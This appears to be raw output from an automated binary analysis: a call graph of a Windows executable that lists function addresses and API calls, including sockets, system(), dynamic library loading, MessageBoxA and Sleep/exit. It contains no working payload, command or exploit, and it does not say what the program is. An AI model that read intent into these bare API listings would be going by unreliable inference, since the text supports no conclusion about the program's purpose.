292 API calls 48896->48900 48897->48918 48903 7ff7e59f7f8b free 48898->48903 48898->48918 48899->48896 48901 7ff7e59f7f13 48900->48901 48962 7ff7e5a0bdd0 28 API calls 48901->48962 48902 7ff7e59f8313 48969 7ff7e5a05970 19 API calls 48902->48969 48963 7ff7e5a0bdd0 28 API calls 48903->48963 48907 7ff7e59f8322 48908 7ff7e59f7fb3 free 48913 7ff7e59f7fc9 48908->48913 48908->48918 48910 7ff7e59f7f44 free 48910->48918 48911 7ff7e59f7f22 48911->48910 48915 7ff7e59f6d00 292 API calls 48913->48915 48914 7ff7e5a071f0 10 API calls 48914->48918 48915->48918 48916 7ff7e5a05970 19 API calls 48917 7ff7e59f731e 48916->48917 48917->48916 48917->48918 48918->48891 48918->48902 48918->48907 48918->48914 48918->48917 48920 7ff7e59f6d00 292 API calls 48918->48920 48960 7ff7e5a05970 19 API calls 48918->48960 48966 7ff7e5a01430 90 API calls 48918->48966 48967 7ff7e59f5a20 15 API calls 48918->48967 48968 7ff7e5a151e0 22 API calls 48918->48968 48920->48918 48922 7ff7e5a0c561 48921->48922 48923 7ff7e5a0c5af 48922->48923 48924 7ff7e5a15fe0 19 API calls 48922->48924 48925 7ff7e5a0c5cd 48923->48925 48926 7ff7e5a0c5b6 48923->48926 48924->48923 48927 7ff7e5a0c5f9 48925->48927 48970 7ff7e5a0cc20 48925->48970 49003 7ff7e5a05970 19 API calls 48926->49003 48929 7ff7e5a0c62e 48927->48929 48930 7ff7e5a0c616 48927->48930 48932 7ff7e59f7eb3 48927->48932 48935 7ff7e5a0d7b0 2 API calls 48929->48935 49004 7ff7e5a0d370 90 API calls 48930->49004 48931 7ff7e5a0c5c5 48931->48932 48932->48888 48961 7ff7e5a0c810 24 API calls 48932->48961 48941 7ff7e5a0c638 48935->48941 48936 7ff7e5a0c626 48936->48929 48936->48932 48937 7ff7e5a0c6a8 49005 7ff7e5a151e0 22 API calls 48937->49005 48939 7ff7e5a0c6b0 48939->48932 49006 7ff7e5a16350 23 API calls 48939->49006 48941->48937 48943 7ff7e5a05af0 15 API calls 48941->48943 48942 7ff7e5a0c6ce 48942->48932 48944 7ff7e5a0c6e2 48942->48944 48950 7ff7e5a0c762 48942->48950 48943->48937 48946 7ff7e5a071f0 10 API calls 48944->48946 48945 7ff7e5a0c7c9 49011 7ff7e5a151e0 22 API calls 48945->49011 48949 7ff7e5a0c6f1 48946->48949 48948 7ff7e5a0c7a0 48948->48945 48952 7ff7e5a0c7b3 48948->48952 48949->48932 48951 7ff7e5a0c6fa 48949->48951 48950->48945 48950->48948 48953 7ff7e5a0c787 48950->48953 48956 7ff7e5a0c74c 48951->48956 48957 7ff7e5a0c731 48951->48957 49010 7ff7e5a05970 19 API calls 48952->49010 49009 7ff7e5a05970 19 API calls 48953->49009 49008 7ff7e5a05970 19 API calls 48956->49008 49007 7ff7e5a05970 19 API calls 48957->49007 48960->48918 48961->48888 48962->48911 48963->48908 48964->48918 48965->48918 48966->48918 48967->48918 48968->48918 48969->48907 48998 7ff7e5a0cc70 48970->48998 48972 7ff7e5a15090 2 API calls 48972->48998 48973 7ff7e5a0d1aa 48975 7ff7e5a05af0 15 API calls 48973->48975 48995 7ff7e5a0d1c3 48973->48995 48974 7ff7e5a0d7b0 2 API calls 48974->48998 48975->48995 48977 7ff7e5a0d187 48977->48973 48979 7ff7e5a05af0 15 API calls 48977->48979 48978 7ff7e5a0cf00 48978->48998 49016 7ff7e5a058b0 fwrite fwrite 48978->49016 49017 7ff7e5a058b0 fwrite fwrite 48978->49017 48979->48973 48983 7ff7e5a0d241 48984 7ff7e5a0d25d 48983->48984 48985 7ff7e5a0d246 48983->48985 49022 7ff7e5a05970 19 API calls 48984->49022 49021 7ff7e5a05970 19 API calls 48985->49021 48986 7ff7e5a0d1af 48988 7ff7e5a0d1b7 48986->48988 48989 7ff7e5a0d1e3 48986->48989 48992 7ff7e5a05af0 15 API calls 48988->48992 49020 7ff7e5a05970 19 API calls 48989->49020 48990 7ff7e5a0d1ef 48990->48995 48991 7ff7e5a05af0 15 API calls 48991->48998 48992->48995 48995->48927 48996 7ff7e5a0cedc 48997 7ff7e5a05af0 15 API calls 48996->48997 48999 7ff7e5a0d208 48997->48999 48998->48972 48998->48973 48998->48974 48998->48977 48998->48978 48998->48983 48998->48986 48998->48991 48998->48995 48998->48996 49000 7ff7e5a05890 23 API calls 48998->49000 49012 7ff7e5a05c60 48998->49012 49015 7ff7e5a12890 192 API calls 48998->49015 49018 7ff7e5a32590 23 API calls 48998->49018 49019 7ff7e5a1f0b0 23 API calls 48998->49019 49002 7ff7e5a05af0 15 API calls 48999->49002 49000->48998 49002->48995 49003->48931 49004->48936 49005->48939 49006->48942 49007->48931 49008->48931 49009->48931 49010->48931 49011->48932 49023 7ff7e5a1b5c0 49012->49023 49015->48998 49016->48978 49017->48998 49018->48998 49019->48998 49020->48990 49021->48990 49022->48990 49024 7ff7e5a1b65e 49023->49024 49025 7ff7e5a1b63f 49023->49025 49026 7ff7e5a1b682 49024->49026 49027 7ff7e5a1b665 49024->49027 49025->49024 49028 7ff7e5a1b645 49025->49028 49030 7ff7e5a1b688 49026->49030 49034 7ff7e5a1b6a1 49026->49034 49029 7ff7e5a05af0 15 API calls 49027->49029 49031 7ff7e5a05af0 15 API calls 49028->49031 49036 7ff7e5a1b654 49029->49036 49032 7ff7e5a05af0 15 API calls 49030->49032 49031->49036 49032->49036 49033 7ff7e5a1baf6 49040 7ff7e5a1bbf5 memcpy memcpy 49033->49040 49044 7ff7e5a1bc3b 49033->49044 49035 7ff7e5a1b6d0 realloc 49034->49035 49037 7ff7e5a1b71e 49034->49037 49058 7ff7e5a1b799 49034->49058 49035->49037 49038 7ff7e5a1b6fd 49035->49038 49036->49033 49043 7ff7e5a08800 14 API calls 49036->49043 49039 7ff7e5a05cf0 2 API calls 49037->49039 49069 7ff7e5a05970 19 API calls 49038->49069 49042 7ff7e5a1b767 49039->49042 49040->49044 49050 7ff7e5a1b95e 49042->49050 49051 7ff7e5a1b78d 49042->49051 49042->49058 49046 7ff7e5a1bae6 49043->49046 49047 7ff7e5a3f580 8 API calls 49044->49047 49045 7ff7e5a1b714 49045->49036 49046->49033 49052 7ff7e5a05af0 15 API calls 49046->49052 49049 7ff7e5a05cbb 49047->49049 49048 7ff7e5a05af0 15 API calls 49048->49058 49049->48998 49053 7ff7e5a05af0 15 API calls 49050->49053 49054 7ff7e5a05af0 15 API calls 49051->49054 49052->49033 49053->49058 49054->49058 49055 7ff7e5a05af0 15 API calls 49055->49036 49056 7ff7e5a19a80 304 API calls 49056->49058 49057 7ff7e5a1ba7e 49057->49036 49057->49055 49058->49036 49058->49048 49058->49056 49058->49057 49059 7ff7e5a1bb07 49058->49059 49060 7ff7e5a1b8a0 realloc 49058->49060 49063 7ff7e5a1b93b memcpy 49058->49063 49065 7ff7e5a1b8eb memcpy 49058->49065 49059->49057 49062 7ff7e5a1bb36 49059->49062 49060->49058 49061 7ff7e5a1bb66 49060->49061 49071 7ff7e5a05970 19 API calls 49061->49071 49070 7ff7e59f1d10 22 API calls 49062->49070 49063->49058 49065->49058 49067 7ff7e5a1bb4f 49068 7ff7e5a05af0 15 API calls 49067->49068 49068->49036 49069->49045 49070->49067 49071->49045 49072 7ff7e59f80b5 49073 7ff7e59f80c4 49072->49073 49077 7ff7e59f80e3 49072->49077 49074 7ff7e59f80d5 49073->49074 49075 7ff7e59f84a0 17 API calls 49073->49075 49076 7ff7e59f6d00 292 API calls 49074->49076 49075->49074 49076->49077 49080 7ff7e59f727b 49077->49080 49093 7ff7e59f5a20 15 API calls 49077->49093 49079 7ff7e59f84a0 17 API calls 49079->49080 49080->49079 49082 7ff7e59f8322 49080->49082 49083 7ff7e59f8313 49080->49083 49087 7ff7e5a071f0 10 API calls 49080->49087 49088 7ff7e59f731e 49080->49088 49091 7ff7e59f6d00 292 API calls 49080->49091 49092 7ff7e5a05970 19 API calls 49080->49092 49094 7ff7e5a01430 90 API calls 49080->49094 49095 7ff7e59f5a20 15 API calls 49080->49095 49096 7ff7e5a151e0 22 API calls 49080->49096 49097 7ff7e5a05970 19 API calls 49083->49097 49087->49080 49088->49080 49089 7ff7e5a05970 19 API calls 49088->49089 49089->49088 49091->49080 49092->49080 49093->49080 49094->49080 49095->49080 49096->49080 49097->49082 49098 7ff7e59fac10 49099 7ff7e59fac54 49098->49099 49100 7ff7e59fac64 49098->49100 49143 7ff7e5a0e0f0 49099->49143 49102 7ff7e5a0d7b0 2 API calls 49100->49102 49103 7ff7e59faca6 49102->49103 49109 7ff7e59fb2b0 calloc 49103->49109 49106 7ff7e59facc5 49107 7ff7e59facce 49150 7ff7e5a05970 19 API calls 49107->49150 49110 7ff7e59fb301 malloc 49109->49110 49111 7ff7e59fb43e _errno 49109->49111 49112 7ff7e59fb38c InitializeCriticalSectionEx 49110->49112 49113 7ff7e59fb3b7 49110->49113 49133 7ff7e59facc1 49111->49133 49151 7ff7e5a14a60 socket 49112->49151 49115 7ff7e59fb3e0 free 49113->49115 49116 7ff7e59fb3d0 DeleteCriticalSection free 49113->49116 49118 7ff7e59fb3f3 49115->49118 49119 7ff7e59fb3f8 49115->49119 49116->49115 49171 7ff7e5a18680 free free free 49118->49171 49122 7ff7e59fb402 closesocket 49119->49122 49123 7ff7e59fb408 free 49119->49123 49120 7ff7e59fb466 _strdup 49120->49113 49124 7ff7e59fb480 free _strdup 49120->49124 49122->49123 49123->49111 49125 7ff7e59fb4a2 49124->49125 49126 7ff7e59fb4ce 49124->49126 49170 7ff7e5a18d50 _beginthreadex 49125->49170 49128 7ff7e59fb551 free 49126->49128 49129 7ff7e59fb4da EnterCriticalSection LeaveCriticalSection 49126->49129 49128->49111 49131 7ff7e59fb515 49129->49131 49132 7ff7e59fb504 CloseHandle 49129->49132 49130 7ff7e59fb4b6 49130->49133 49134 7ff7e59fb4be _errno 49130->49134 49136 7ff7e59fb522 49131->49136 49137 7ff7e59fb51a 49131->49137 49135 7ff7e59fb538 49132->49135 49133->49106 49133->49107 49134->49126 49140 7ff7e59fb548 closesocket 49135->49140 49174 7ff7e59f5b00 free 49135->49174 49173 7ff7e59fb130 7 API calls 49136->49173 49172 7ff7e5a18da0 WaitForSingleObjectEx CloseHandle 49137->49172 49140->49128 49142 7ff7e59fb52b free 49142->49135 49144 7ff7e5a0e0f9 49143->49144 49145 7ff7e5a0e10f socket 49143->49145 49144->49100 49146 7ff7e5a0e12c 49145->49146 49147 7ff7e5a0e125 49145->49147 49148 7ff7e5a065d0 2 API calls 49146->49148 49147->49100 49149 7ff7e5a0e136 49148->49149 49149->49100 49150->49106 49152 7ff7e5a14ab0 49151->49152 49153 7ff7e5a14ab5 htonl setsockopt 49151->49153 49156 7ff7e5a3f580 8 API calls 49152->49156 49154 7ff7e5a14c3b closesocket closesocket closesocket 49153->49154 49155 7ff7e5a14b14 bind 49153->49155 49154->49152 49155->49154 49157 7ff7e5a14b2f getsockname 49155->49157 49158 7ff7e59fb3af 49156->49158 49157->49154 49159 7ff7e5a14b4b listen 49157->49159 49158->49113 49158->49120 49159->49154 49160 7ff7e5a14b60 socket 49159->49160 49160->49154 49161 7ff7e5a14b7b connect 49160->49161 49161->49154 49162 7ff7e5a14b96 accept 49161->49162 49162->49154 49163 7ff7e5a14bb2 49162->49163 49164 7ff7e5a08e80 13 API calls 49163->49164 49165 7ff7e5a14bc9 send 49164->49165 49165->49154 49167 7ff7e5a14bfa recv 49165->49167 49167->49154 49168 7ff7e5a14c18 memcmp 49167->49168 49168->49154 49169 7ff7e5a14c2e closesocket 49168->49169 49169->49152 49170->49130 49171->49119 49172->49136 49173->49142 49174->49140 49175 7ff7e5a3f85c 49176 7ff7e5a3f875 49175->49176 49177 7ff7e5a3f87d 49176->49177 49178 7ff7e5a3f9b3 49176->49178 49180 7ff7e5a3f9bd 49177->49180 49183 7ff7e5a3f89b __scrt_release_startup_lock 49177->49183 49261 7ff7e5a3fd4c 9 API calls 49178->49261 49262 7ff7e5a3fd4c 9 API calls 49180->49262 49182 7ff7e5a3f9c8 49185 7ff7e5a3f9d0 _exit 49182->49185 49184 7ff7e5a3f8c0 49183->49184 49186 7ff7e5a3f946 _get_initial_narrow_environment __p___argv __p___argc 49183->49186 49189 7ff7e5a3f93e _register_thread_local_exe_atexit_callback 49183->49189 49195 7ff7e59f1530 rand 49186->49195 49189->49186 49196 7ff7e59f1583 49195->49196 49196->49196 49263 7ff7e59f0580 49196->49263 49198 7ff7e59f1595 rand 49199 7ff7e59f1633 SetConsoleTitleA 49198->49199 49200 7ff7e59f15c0 49198->49200 49202 7ff7e59f1685 8 API calls 49199->49202 49203 7ff7e59f1651 49199->49203 49201 7ff7e59f15c2 rand 49200->49201 49210 7ff7e59f162f 49200->49210 49367 7ff7e59f0680 7 API calls Concurrency::cancel_current_task 49200->49367 49201->49200 49282 7ff7e59e2aa0 49202->49282 49204 7ff7e59f1680 49203->49204 49206 7ff7e59f1679 _invalid_parameter_noinfo_noreturn 49203->49206 49204->49202 49206->49204 49210->49199 49261->49180 49262->49182 49264 7ff7e59f05a6 49263->49264 49265 7ff7e59f0671 49263->49265 49267 7ff7e59f05b4 memcpy 49264->49267 49268 7ff7e59f05cc 49264->49268 49390 7ff7e59e1a90 ?_Xlength_error@std@@YAXPEBD 49265->49390 49267->49198 49269 7ff7e59f05dd 49268->49269 49270 7ff7e59f0676 49268->49270 49271 7ff7e59f0634 49268->49271 49388 7ff7e5a3f1f0 __std_exception_copy malloc _CxxThrowException Concurrency::cancel_current_task 49269->49388 49391 7ff7e59e19f0 __std_exception_copy Concurrency::cancel_current_task 49270->49391 49274 7ff7e59f0643 49271->49274 49275 7ff7e59f0639 49271->49275 49279 7ff7e59f0645 memcpy 49274->49279 49389 7ff7e5a3f1f0 __std_exception_copy malloc _CxxThrowException Concurrency::cancel_current_task 49275->49389 49276 7ff7e59f05f3 49280 7ff7e59f062d _invalid_parameter_noinfo_noreturn 49276->49280 49281 7ff7e59f05f8 49276->49281 49277 7ff7e59f067c 49279->49198 49280->49271 49281->49279 49392 7ff7e59e2840 49282->49392 49284 7ff7e59e2aea 49285 7ff7e59e30a8 49284->49285 49405 7ff7e59e3160 49284->49405 49472 7ff7e59e3120 7 API calls 49285->49472 49288 7ff7e59e3104 Sleep exit 49289 7ff7e59e3118 49288->49289 49473 7ff7e59e19f0 __std_exception_copy Concurrency::cancel_current_task 49289->49473 49290 7ff7e59e2b6f 49417 7ff7e59e3c30 49290->49417 49293 7ff7e59e311d 49294 7ff7e59e2b7c 49424 7ff7e59e32d0 49294->49424 49296 7ff7e59e2bac 49297 7ff7e59e3c30 10 API calls 49296->49297 49298 7ff7e59e2bb8 49297->49298 49432 7ff7e59e33d0 49298->49432 49300 7ff7e59e2beb 49301 7ff7e59e3c30 10 API calls 49300->49301 49302 7ff7e59e2bf8 49301->49302 49303 7ff7e59e2c4f 49302->49303 49305 7ff7e59e2c48 _invalid_parameter_noinfo_noreturn 49302->49305 49304 7ff7e59e2c9f 49303->49304 49308 7ff7e59e2c98 _invalid_parameter_noinfo_noreturn 49303->49308 49306 7ff7e59e2cde 49304->49306 49309 7ff7e59e2cd7 _invalid_parameter_noinfo_noreturn 49304->49309 49305->49303 49307 7ff7e59e2d2c 49306->49307 49312 7ff7e59e2d25 _invalid_parameter_noinfo_noreturn 49306->49312 49310 7ff7e59e2d6b 49307->49310 49314 7ff7e59e2d64 _invalid_parameter_noinfo_noreturn 49307->49314 49308->49304 49309->49306 49310->49289 49311 7ff7e59e2db9 49310->49311 49313 7ff7e59e2e1f 49310->49313 49316 7ff7e59e2dfa 49310->49316 49440 7ff7e59e3550 49311->49440 49312->49307 49317 7ff7e59e2e24 49313->49317 49318 7ff7e59e2e2b 49313->49318 49314->49310 49456 7ff7e5a3f1f0 __std_exception_copy malloc _CxxThrowException Concurrency::cancel_current_task 49316->49456 49457 7ff7e5a3f1f0 __std_exception_copy malloc _CxxThrowException Concurrency::cancel_current_task 49317->49457 49322 7ff7e59e2e2e memcpy 49318->49322 49322->49311 49323 7ff7e59e2840 6 API calls 49326 7ff7e59e2e60 49323->49326 49324 7ff7e59e2e02 49325 7ff7e59e2e0a 49324->49325 49327 7ff7e59e2e18 _invalid_parameter_noinfo_noreturn 49324->49327 49325->49322 49458 7ff7e59e4bd0 118 API calls 49326->49458 49327->49313 49329 7ff7e59e2e75 49459 7ff7e59e48c0 19 API calls 49329->49459 49331 7ff7e59e2e86 49332 7ff7e59e2fa3 49331->49332 49333 7ff7e59e2e9e 49331->49333 49367->49200 49388->49276 49389->49281 49391->49277 49393 7ff7e59e2890 49392->49393 49393->49393 49394 7ff7e59e28a0 system 49393->49394 49395 7ff7e59e2900 49394->49395 49395->49395 49396 7ff7e59e2910 system 49395->49396 49397 7ff7e59e2960 49396->49397 49397->49397 49398 7ff7e59e2970 system 49397->49398 49399 7ff7e59e29b0 49398->49399 49399->49399 49400 7ff7e59e29c0 system 49399->49400 49401 7ff7e59e2a00 49400->49401 49401->49401 49402 7ff7e59e2a10 system 49401->49402 49403 7ff7e59e2a70 49402->49403 49403->49403 49404 7ff7e59e2a80 system 49403->49404 49404->49284 49406 7ff7e59e317e 49405->49406 49407 7ff7e59e31c8 49406->49407 49501 7ff7e59e4310 7 API calls Concurrency::cancel_current_task 49406->49501 49409 7ff7e59e3227 49407->49409 49502 7ff7e59e4310 7 API calls Concurrency::cancel_current_task 49407->49502 49474 7ff7e59e5dd0 49409->49474 49413 7ff7e59e3276 49414 7ff7e59e32b7 49413->49414 49416 7ff7e59e32b0 _invalid_parameter_noinfo_noreturn 49413->49416 49414->49290 49415 7ff7e59e326f _invalid_parameter_noinfo_noreturn 49415->49413 49416->49414 49418 7ff7e59e3c4d 49417->49418 49419 7ff7e59e3c63 memcpy 49418->49419 49420 7ff7e59e3ca8 49418->49420 49419->49294 49507 7ff7e59e4eb0 9 API calls Concurrency::cancel_current_task 49420->49507 49423 7ff7e59e3cbb 49423->49294 49427 7ff7e59e32ee 49424->49427 49426 7ff7e59e3338 49508 7ff7e59e6dd0 49426->49508 49427->49426 49514 7ff7e59e4310 7 API calls Concurrency::cancel_current_task 49427->49514 49429 7ff7e59e3354 49430 7ff7e59e33b7 49429->49430 49431 7ff7e59e33b0 _invalid_parameter_noinfo_noreturn 49429->49431 49430->49296 49431->49430 49433 7ff7e59e33ee 49432->49433 49434 7ff7e59e3438 49433->49434 49516 7ff7e59e4310 7 API calls Concurrency::cancel_current_task 49433->49516 49436 7ff7e59e6dd0 12 API calls 49434->49436 49437 7ff7e59e3454 49436->49437 49438 7ff7e59e34b7 49437->49438 49439 7ff7e59e34b0 _invalid_parameter_noinfo_noreturn 49437->49439 49438->49300 49439->49438 49441 7ff7e59e2840 6 API calls 49440->49441 49442 7ff7e59e358c 49441->49442 49517 7ff7e59f1ad0 49442->49517 49444 7ff7e59e3591 49445 7ff7e59e359d 49444->49445 49451 7ff7e59e3632 49444->49451 49546 7ff7e59e4310 7 API calls Concurrency::cancel_current_task 49445->49546 49447 7ff7e59e35c1 49449 7ff7e59e378a _invalid_parameter_noinfo_noreturn 49447->49449 49455 7ff7e59e35f4 49447->49455 49448 7ff7e5a3f580 8 API calls 49450 7ff7e59e2e5a 49448->49450 49450->49323 49525 7ff7e59f1b90 49451->49525 49453 7ff7e59e370e 49453->49447 49454 7ff7e59e3719 MessageBoxA 49453->49454 49454->49447 49455->49448 49456->49324 49457->49325 49458->49329 49459->49331 49472->49288 49473->49293 49475 7ff7e59e5e6f 49474->49475 49476 7ff7e59e5e1a 49474->49476 49477 7ff7e59e5e77 memcpy 49475->49477 49482 7ff7e59e5ecb 49475->49482 49476->49475 49486 7ff7e59e5e1f memcpy 49476->49486 49478 7ff7e59e5eb4 memcpy 49477->49478 49479 7ff7e59e5eb1 49477->49479 49480 7ff7e59e323a 49478->49480 49479->49478 49480->49413 49480->49415 49483 7ff7e59e5f49 49482->49483 49488 7ff7e59e5fac 49482->49488 49489 7ff7e59e5f27 49482->49489 49498 7ff7e59e5fb1 49482->49498 49487 7ff7e59e5f4e 49483->49487 49492 7ff7e59e5f56 memcpy 49483->49492 49486->49480 49504 7ff7e5a3f1f0 __std_exception_copy malloc _CxxThrowException Concurrency::cancel_current_task 49487->49504 49505 7ff7e59e19f0 __std_exception_copy Concurrency::cancel_current_task 49488->49505 49503 7ff7e5a3f1f0 __std_exception_copy malloc _CxxThrowException Concurrency::cancel_current_task 49489->49503 49496 7ff7e59e5f83 memcpy 49492->49496 49497 7ff7e59e5f80 49492->49497 49495 7ff7e59e5f34 49495->49492 49496->49480 49497->49496 49506 7ff7e59e1a90 ?_Xlength_error@std@@YAXPEBD 49498->49506 49499 7ff7e59e5f2f 49499->49495 49500 7ff7e59e5f42 _invalid_parameter_noinfo_noreturn 49499->49500 49500->49483 49501->49407 49502->49409 49503->49499 49504->49495 49505->49498 49507->49423 49509 7ff7e59e6e95 49508->49509 49513 7ff7e59e6e00 memcpy memcpy memcpy 49508->49513 49515 7ff7e59ec600 9 API calls Concurrency::cancel_current_task 49509->49515 49511 7ff7e59e6eaa 49511->49429 49513->49429 49514->49426 49515->49511 49516->49434 49518 7ff7e59f1add calloc 49517->49518 49524 7ff7e59f1b40 49517->49524 49520 7ff7e59f1b32 49518->49520 49522 7ff7e59f1b6c 49520->49522 49547 7ff7e5a08980 49520->49547 49521 7ff7e59f1b61 49521->49444 49522->49444 49524->49522 49578 7ff7e5a018b0 calloc 49524->49578 49526 7ff7e59f1b9f 49525->49526 49527 7ff7e59f1ba9 49525->49527 49526->49453 49528 7ff7e59f1bc2 49527->49528 49529 7ff7e59f1bda 49527->49529 49677 7ff7e5a05970 19 API calls 49528->49677 49534 7ff7e59f1bf6 49529->49534 49629 7ff7e59f5bc0 calloc 49529->49629 49532 7ff7e59f1bfe 49532->49453 49533 7ff7e59f1bce 49533->49453 49534->49532 49657 7ff7e59f6470 49534->49657 49536 7ff7e59f1c52 49537 7ff7e59f1c58 49536->49537 49544 7ff7e59f1c83 49536->49544 49678 7ff7e59f6620 292 API calls 49537->49678 49539 7ff7e59f1cd8 49679 7ff7e59f6930 292 API calls 49539->49679 49540 7ff7e59f1c60 49540->49453 49543 7ff7e59f1cf8 49543->49453 49544->49539 49664 7ff7e59f6900 49544->49664 49667 7ff7e59f67f0 49544->49667 49546->49447 49548 7ff7e5a0899e WSAStartup 49547->49548 49549 7ff7e5a089e6 49547->49549 49550 7ff7e5a089c9 49548->49550 49551 7ff7e5a089b2 49548->49551 49598 7ff7e5a32480 49549->49598 49554 7ff7e5a3f580 8 API calls 49550->49554 49551->49549 49553 7ff7e5a089c3 WSACleanup 49551->49553 49553->49550 49556 7ff7e5a089de 49554->49556 49556->49524 49557 7ff7e5a08caf 49559 7ff7e5a3f580 8 API calls 49557->49559 49558 7ff7e5a089f3 GetModuleHandleA 49560 7ff7e5a08a2e GetProcAddress strpbrk 49558->49560 49561 7ff7e5a08a22 49558->49561 49562 7ff7e5a08cbf 49559->49562 49564 7ff7e5a08a8b 49560->49564 49565 7ff7e5a08a65 49560->49565 49563 7ff7e5a08bb3 7 API calls 49561->49563 49562->49524 49563->49557 49566 7ff7e5a08aba GetSystemDirectoryA 49564->49566 49567 7ff7e5a08a90 GetProcAddress 49564->49567 49568 7ff7e5a08a7d LoadLibraryA 49565->49568 49571 7ff7e5a08a6d 49565->49571 49570 7ff7e5a08ad7 malloc 49566->49570 49566->49571 49567->49566 49569 7ff7e5a08aa5 LoadLibraryExA 49567->49569 49568->49571 49569->49571 49573 7ff7e5a08b69 free 49570->49573 49574 7ff7e5a08aec GetSystemDirectoryA 49570->49574 49571->49563 49572 7ff7e5a08b8e GetProcAddress 49571->49572 49572->49563 49573->49571 49574->49573 49575 7ff7e5a08afc 49574->49575 49576 7ff7e5a08b60 LoadLibraryA 49575->49576 49577 7ff7e5a08b56 49575->49577 49576->49577 49577->49573 49579 7ff7e5a018d6 49578->49579 49580 7ff7e5a018e5 49578->49580 49579->49521 49624 7ff7e59fadd0 calloc 49580->49624 49582 7ff7e5a01908 49583 7ff7e5a0190e free 49582->49583 49584 7ff7e5a0191c malloc 49582->49584 49585 7ff7e5a01c44 49583->49585 49586 7ff7e5a01c08 49584->49586 49587 7ff7e5a01937 malloc 49584->49587 49585->49521 49589 7ff7e5a01c14 free free 49586->49589 49587->49586 49588 7ff7e5a01952 __acrt_iob_func __acrt_iob_func __acrt_iob_func 49587->49588 49625 7ff7e59fbd80 memset 49588->49625 49628 7ff7e5a01610 free free free 49589->49628 49592 7ff7e5a01a72 49626 7ff7e59ff850 free realloc GetEnvironmentVariableA realloc free 49592->49626 49595 7ff7e5a01b36 49627 7ff7e5a056f0 free free free free free 49595->49627 49597 7ff7e5a01bea 49597->49585 49599 7ff7e5a3248e 49598->49599 49600 7ff7e5a089eb 49598->49600 49601 7ff7e5a08800 14 API calls 49599->49601 49600->49557 49600->49558 49602 7ff7e5a324a1 49601->49602 49606 7ff7e5a08660 GetModuleHandleA 49602->49606 49604 7ff7e5a324ba 49604->49600 49605 7ff7e5a324c6 GetProcAddressForCaller 49604->49605 49605->49600 49607 7ff7e5a0868a GetProcAddress strpbrk 49606->49607 49608 7ff7e5a08682 49606->49608 49609 7ff7e5a086b7 49607->49609 49610 7ff7e5a086ee 49607->49610 49608->49604 49611 7ff7e5a086d8 LoadLibraryA 49609->49611 49612 7ff7e5a086bf 49609->49612 49613 7ff7e5a086f3 GetProcAddress 49610->49613 49614 7ff7e5a08726 GetSystemDirectoryA 49610->49614 49611->49604 49612->49604 49613->49614 49615 7ff7e5a08708 LoadLibraryExA 49613->49615 49616 7ff7e5a087e8 49614->49616 49617 7ff7e5a08740 malloc 49614->49617 49615->49604 49616->49604 49619 7ff7e5a087da free 49617->49619 49620 7ff7e5a0876d GetSystemDirectoryA 49617->49620 49619->49616 49620->49619 49621 7ff7e5a0877d 49620->49621 49622 7ff7e5a087d1 LoadLibraryA 49621->49622 49623 7ff7e5a087c6 49621->49623 49622->49623 49623->49619 49624->49582 49625->49592 49626->49595 49627->49597 49630 7ff7e59f5bfb 49629->49630 49631 7ff7e59f5beb 49629->49631 49680 7ff7e5a0eaf0 49630->49680 49631->49534 49634 7ff7e59f5d17 49699 7ff7e5a0ddd0 free 49634->49699 49637 7ff7e59f5d23 49700 7ff7e5a0ddd0 free 49637->49700 49638 7ff7e59f5c42 49638->49634 49688 7ff7e59fe580 49638->49688 49658 7ff7e59f64b8 49657->49658 49659 7ff7e59f6489 49657->49659 49658->49536 49659->49658 49702 7ff7e59f57f0 17 API calls 49659->49702 49661 7ff7e59f658d 49703 7ff7e59f62c0 10 API calls 49661->49703 49663 7ff7e59f65eb 49663->49536 49704 7ff7e59f5dc0 49664->49704 49668 7ff7e5a0d7b0 2 API calls 49667->49668 49670 7ff7e59f6817 49668->49670 49669 7ff7e59f6838 49669->49544 49670->49669 49673 7ff7e59f6873 49670->49673 49754 7ff7e59f7220 49670->49754 49677->49533 49678->49540 49679->49543 49681 7ff7e5a0de40 malloc 49680->49681 49682 7ff7e59f5c12 49681->49682 49682->49634 49683 7ff7e5a0de40 49682->49683 49684 7ff7e5a0de57 49683->49684 49685 7ff7e5a0def6 49683->49685 49684->49685 49686 7ff7e5a0de77 malloc 49684->49686 49685->49638 49687 7ff7e5a0dea6 49686->49687 49687->49638 49699->49637 49702->49661 49703->49663 49711 7ff7e59f5e21 49704->49711 49717 7ff7e59f6239 49704->49717 49705 7ff7e59f5e36 49711->49705 49711->49717 49728 7ff7e59f83c0 49711->49728 49776 7ff7e59f7570 49777 7ff7e59f7581 49776->49777 49804 7ff7e5a0e420 49777->49804 49779 7ff7e59f75b5 49780 7ff7e59f75e7 49779->49780 49782 7ff7e5a05af0 15 API calls 49779->49782 49832 7ff7e5a0ee70 314 API calls 49780->49832 49784 7ff7e59f75e1 49782->49784 49783 7ff7e59f75f4 49785 7ff7e59f75f7 49783->49785 49784->49780 49784->49785 49808 7ff7e59f8520 49785->49808 49789 7ff7e59f84a0 17 API calls 49802 7ff7e59f727b 49789->49802 49793 7ff7e59f8313 49836 7ff7e5a05970 19 API calls 49793->49836 49795 7ff7e59f8322 49798 7ff7e5a071f0 10 API calls 49798->49802 49799 7ff7e5a05970 19 API calls 49800 7ff7e59f731e 49799->49800 49800->49799 49800->49802 49802->49789 49802->49793 49802->49795 49802->49798 49802->49800 49803 7ff7e59f6d00 292 API calls 49802->49803 49830 7ff7e5a05970 19 API calls 49802->49830 49833 7ff7e5a01430 90 API calls 49802->49833 49834 7ff7e59f5a20 15 API calls 49802->49834 49835 7ff7e5a151e0 22 API calls 49802->49835 49803->49802 49805 7ff7e5a0e44a 49804->49805 49837 7ff7e5a0ef50 49805->49837 49807 7ff7e5a0e469 49807->49779 49815 7ff7e59f8586 49808->49815 49809 7ff7e59f8908 memcpy memcpy 49810 7ff7e59f87f0 49809->49810 49811 7ff7e5a3f580 8 API calls 49810->49811 49813 7ff7e59f7602 49811->49813 49812 7ff7e59f87fa 49812->49809 49816 7ff7e59f8904 49812->49816 49853 7ff7e5a0ddd0 free 49812->49853 49813->49802 49824 7ff7e5a0eb40 49813->49824 49814 7ff7e59f86ce calloc 49814->49810 49819 7ff7e59f86e8 49814->49819 49815->49812 49815->49814 49815->49819 49816->49809 49817 7ff7e5a0de40 malloc 49817->49819 49818 7ff7e59f87e7 free 49818->49810 49819->49810 49819->49815 49819->49817 49819->49818 49820 7ff7e5a0db00 malloc memcpy 49819->49820 49821 7ff7e59f87df 49819->49821 49820->49819 49852 7ff7e5a0ddd0 free 49821->49852 49825 7ff7e5a0eb59 49824->49825 49854 7ff7e5a01e90 49825->49854 49827 7ff7e5a0eb70 49828 7ff7e59f750c 